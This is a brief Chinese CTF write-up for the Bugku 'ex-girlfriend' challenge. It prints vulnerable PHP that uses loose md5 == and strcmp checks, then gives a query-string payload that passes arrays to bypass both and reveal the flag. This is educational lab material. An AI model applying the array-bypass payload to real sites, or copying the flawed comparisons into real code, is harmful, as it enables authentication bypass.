Bugku-前女友(SKCTF)

进入后发现首页是一段很伤感的话，做个题都这么伤感，哎。。。。

查看网页源代码，发现code.txt,访问查看，发现是个审计题，代码分析如下：

<?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){     $v1 = $_GET['v1'];     $v2 = $_GET['v2'];     $v3 = $_GET['v3'];     if($v1 != $v2 && md5($v1) == md5($v2)){  //md5不能用来算数组，这里用数组绕过,v1和v2的值不能一样         if(!strcmp($v3, $flag)){  //strcmp函数的作用是比较两个值是否相等，如果相等返回0，而if是里面的！是非，非0则TURE             echo $flag;         }     } } ?>

于是构造payload：http://123.206.31.85:49162/?v1[]=a&v2[]=b&v3[]=c
得到flag。。。

http://www.oniont.cn/index.php/archives/103.html

免责声明：本站某些文章、信息、图片、软件等来源于互联网，由本网整理发表，希望传递更多信息和学习之目的，并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题，请立即联系管理员，我们会给予更改或删除相关文章，保证您的权利。